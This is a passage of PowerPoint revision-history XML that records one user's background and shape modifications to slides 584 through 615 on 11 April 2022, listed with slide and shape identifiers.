        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1707395943" sldId="584"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1707395943" sldId="584"/>
            <ac:spMk id="2" creationId="{DA5D00DD-7FB5-44C0-AA7F-65C0EC888905}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1707395943" sldId="584"/>
            <ac:spMk id="3" creationId="{D921AD94-A2F7-4703-B26D-7C0CC2F20A58}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1707395943" sldId="584"/>
            <ac:spMk id="4" creationId="{26D3D059-E118-452F-841E-E0A41DB518D2}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3259287668" sldId="585"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3259287668" sldId="585"/>
            <ac:spMk id="2" creationId="{D80DFFB4-A77E-4844-9107-190AF37ACF58}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3259287668" sldId="585"/>
            <ac:spMk id="3" creationId="{4CD06853-6E46-452B-A03E-51C1DBC2BDB7}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3843321126" sldId="586"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3843321126" sldId="586"/>
            <ac:spMk id="2" creationId="{25D9F809-79E3-4A3F-BA77-EFC20A41B7F9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3843321126" sldId="586"/>
            <ac:spMk id="3" creationId="{0DC1737B-2160-455C-9F84-C9C302E01E23}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="467684595" sldId="587"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="467684595" sldId="587"/>
            <ac:spMk id="2" creationId="{25D9F809-79E3-4A3F-BA77-EFC20A41B7F9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="467684595" sldId="587"/>
            <ac:spMk id="3" creationId="{0DC1737B-2160-455C-9F84-C9C302E01E23}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3440142252" sldId="588"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3440142252" sldId="588"/>
            <ac:spMk id="2" creationId="{25D9F809-79E3-4A3F-BA77-EFC20A41B7F9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3440142252" sldId="588"/>
            <ac:spMk id="3" creationId="{0DC1737B-2160-455C-9F84-C9C302E01E23}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1875391266" sldId="589"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1875391266" sldId="589"/>
            <ac:spMk id="2" creationId="{25D9F809-79E3-4A3F-BA77-EFC20A41B7F9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1875391266" sldId="589"/>
            <ac:spMk id="3" creationId="{0DC1737B-2160-455C-9F84-C9C302E01E23}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1651431959" sldId="590"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1651431959" sldId="590"/>
            <ac:spMk id="2" creationId="{25D9F809-79E3-4A3F-BA77-EFC20A41B7F9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1651431959" sldId="590"/>
            <ac:spMk id="3" creationId="{0DC1737B-2160-455C-9F84-C9C302E01E23}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1909216740" sldId="591"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1909216740" sldId="591"/>
            <ac:spMk id="2" creationId="{3B44C311-A81E-4D7E-B082-629B8360BA88}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1909216740" sldId="591"/>
            <ac:spMk id="6" creationId="{5467BD28-3A84-4B6F-AC01-F5C204780D52}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:41.671" v="134"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2896315851" sldId="592"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:41.671" v="134"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3647981920" sldId="593"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:41.671" v="134"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="610553910" sldId="594"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:41.671" v="134"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3639676061" sldId="595"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:41.671" v="134"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3858629732" sldId="596"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:41.671" v="134"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1743583879" sldId="597"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:41.671" v="134"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="705807428" sldId="598"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:41.671" v="134"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3583894648" sldId="599"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:41.671" v="134"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="137911905" sldId="600"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:41.671" v="134"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="103757728" sldId="601"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:41.671" v="134"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2523899263" sldId="602"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:41.671" v="134"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1645084347" sldId="603"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:41.671" v="134"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="365958429" sldId="604"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:41.671" v="134"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="484568951" sldId="605"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:41.671" v="134"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1599925140" sldId="606"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2348361483" sldId="607"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2348361483" sldId="607"/>
            <ac:spMk id="2" creationId="{8264BD35-CFBA-4D55-9958-459CBCD5671C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2348361483" sldId="607"/>
            <ac:spMk id="3" creationId="{E2EAEF7B-C69E-428F-9BA4-6C74E3D55472}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2882944866" sldId="608"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2882944866" sldId="608"/>
            <ac:spMk id="2" creationId="{342E2A71-87E3-46D1-AF78-6624C7630DDA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2882944866" sldId="608"/>
            <ac:spMk id="6" creationId="{41BFCE23-1FC2-46A2-9AA6-1AE2CE69F2B9}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4142121253" sldId="609"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4142121253" sldId="609"/>
            <ac:spMk id="2" creationId="{A56863F8-5F79-4109-809D-BBFFF2647F30}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4142121253" sldId="609"/>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1503447495" sldId="610"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1503447495" sldId="610"/>
            <ac:spMk id="2" creationId="{A56863F8-5F79-4109-809D-BBFFF2647F30}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1503447495" sldId="610"/>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2434524607" sldId="611"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2434524607" sldId="611"/>
            <ac:spMk id="2" creationId="{A56863F8-5F79-4109-809D-BBFFF2647F30}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2434524607" sldId="611"/>
            <ac:spMk id="3" creationId="{610D8F8E-46F0-4DD3-92AC-FAAB70E1A039}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1602501520" sldId="612"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1602501520" sldId="612"/>
            <ac:spMk id="2" creationId="{644C3199-A0F0-4462-9201-94CBC57740BB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1602501520" sldId="612"/>
            <ac:spMk id="4" creationId="{B89C448B-808E-493E-AC67-950BFE6E7035}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1173719603" sldId="613"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1173719603" sldId="613"/>
            <ac:spMk id="2" creationId="{674FFB1F-4060-4442-94C7-9390E36E0402}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1173719603" sldId="613"/>
            <ac:spMk id="3" creationId="{B6F1A859-B97A-43A0-A447-5CB851A615FA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1173719603" sldId="613"/>
            <ac:spMk id="5" creationId="{2711BF69-0928-4A12-8E89-D7DF8C42B347}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="570047813" sldId="614"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="570047813" sldId="614"/>
            <ac:spMk id="2" creationId="{7326F615-FFF2-4132-B136-9A9F0054B1C2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="570047813" sldId="614"/>
            <ac:spMk id="3" creationId="{A883C734-D9E6-4319-8DD6-3D1DFF1380B4}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1452016038" sldId="615"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1452016038" sldId="615"/>
            <ac:spMk id="2" creationId="{DBDC8E95-941D-4305-8BD8-3444E002C080}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1452016038" sldId="615"/>
            <ac:spMk id="3" creationId="{A202A917-3C96-48A1-A601-A5E48E3BE708}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
